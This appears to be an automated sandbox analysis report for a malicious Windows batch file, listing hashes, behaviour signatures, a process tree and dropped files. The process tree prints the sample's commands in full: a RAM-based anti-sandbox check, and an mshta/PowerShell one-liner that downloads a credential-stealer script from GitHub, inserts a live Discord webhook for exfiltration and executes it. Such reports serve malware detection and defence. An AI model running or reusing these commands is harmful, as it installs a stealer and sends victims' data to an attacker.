Overview

overview

7

Static

static

1

84617e9c08...36.bat

windows7-x64

7

84617e9c08...36.bat

windows10-2004-x64

4

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    05/07/2024, 01:01

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat

  • Size

    3.4MB

  • MD5

    07f9549ba0e65bb2bd47fcf55c60a608

  • SHA1

    50f97f17245b1967ae322f5a72f48184db4932fa

  • SHA256

    84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36

  • SHA512

    d9c2e350d2e963b64c6da7519cdbf15a56a61131098d608721d2e0773e6632b4cb89b90165b212b83b271b5f136539dfe3586dbeef8db6bedc0d358b8d02cd41

  • SSDEEP

    1536:r9M37hEimNW4QbAjC5SMd0aF00kd5Regk1IcIoJkFVcKaoowmgd27/:IENXCbiae0kjRep6VcEo/gUT

Score
7/10
defense_evasion

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:328
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"
      2⤵
        PID:1320
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
        2⤵
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2148
      • C:\Windows\system32\findstr.exe
        findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"
        2⤵
          PID:2728
        • C:\Windows\system32\findstr.exe
          findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"
          2⤵
            PID:2628
          • C:\Windows\system32\chcp.com
            chcp 65001
            2⤵
              PID:2544
            • C:\Windows\system32\findstr.exe
              findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"
              2⤵
                PID:2528
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -nop -c "Write-Host -NoNewLine $null"
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2568
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -nop -c "Write-Host -NoNewLine $null"
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1956
              • C:\Windows\system32\rundll32.exe
                rundll32
                2⤵
                  PID:2856
                • C:\Windows\system32\net.exe
                  net session
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2936
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 session
                    3⤵
                      PID:2980
                  • C:\Windows\system32\mshta.exe
                    mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))
                    2⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:760
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:308

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\kdotzASik.bat
                        Filesize

                        231B

                        MD5

                        1fdf1ddeddb7b144e8f93262144a56d1

                        SHA1

                        cfcd1c4ebcf5e83a583ac8688aa5062abf57c8d1

                        SHA256

                        c71e50112a771b021417874d43158b7f2edb7c6f17102898c9015cef675e8917

                        SHA512

                        91ab8c53c36af4f34db66a4f26261e2dd92d9b2519291380f9a07aaa00a820788342314ea623dfae2c1dd55627c89e732a366a85086326ca3b04893cb4f626d5

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                        Filesize

                        7KB

                        MD5

                        b4bdfec1daf86cf76948034b7b15c517

                        SHA1

                        fc0160fb6ea409a3e1a3024be85aabe703c2f664

                        SHA256

                        143e49d8e51427180878a8713bd6849b1b52d882b36c7e34e9cf255adf092b75

                        SHA512

                        4c3deb6817df02ce532518314812745521f6890db54a0c559add8e05fd54022dd8a7692683371d4ac613999b6975bab0781781dccdc4975fc1f4bd45f53397da

                        Download Submit

                      • memory/2148-20-0x000007FEF6010000-0x000007FEF69AD000-memory.dmp

                        Filesize

                        9.6MB

                        Download

                      • memory/2148-18-0x000007FEF6010000-0x000007FEF69AD000-memory.dmp

                        Filesize

                        9.6MB

                        Download

                      • memory/2148-19-0x000007FEF6010000-0x000007FEF69AD000-memory.dmp

                        Filesize

                        9.6MB

                        Download

                      • memory/2148-17-0x00000000021D0000-0x00000000021D8000-memory.dmp

                        Filesize

                        32KB

                        Download

                      • memory/2148-21-0x000007FEF6010000-0x000007FEF69AD000-memory.dmp

                        Filesize

                        9.6MB

                        Download

                      • memory/2148-22-0x000007FEF6010000-0x000007FEF69AD000-memory.dmp

                        Filesize

                        9.6MB

                        Download

                      • memory/2148-23-0x000007FEF6010000-0x000007FEF69AD000-memory.dmp

                        Filesize

                        9.6MB

                        Download

                      • memory/2148-16-0x000000001B650000-0x000000001B932000-memory.dmp

                        Filesize

                        2.9MB

                        Download

                      • memory/2148-15-0x000007FEF62CE000-0x000007FEF62CF000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/2568-62-0x000000001B710000-0x000000001B9F2000-memory.dmp

                        Filesize

                        2.9MB

                        Download

                      • memory/2568-63-0x0000000001E20000-0x0000000001E28000-memory.dmp

                        Filesize

                        32KB

                        Download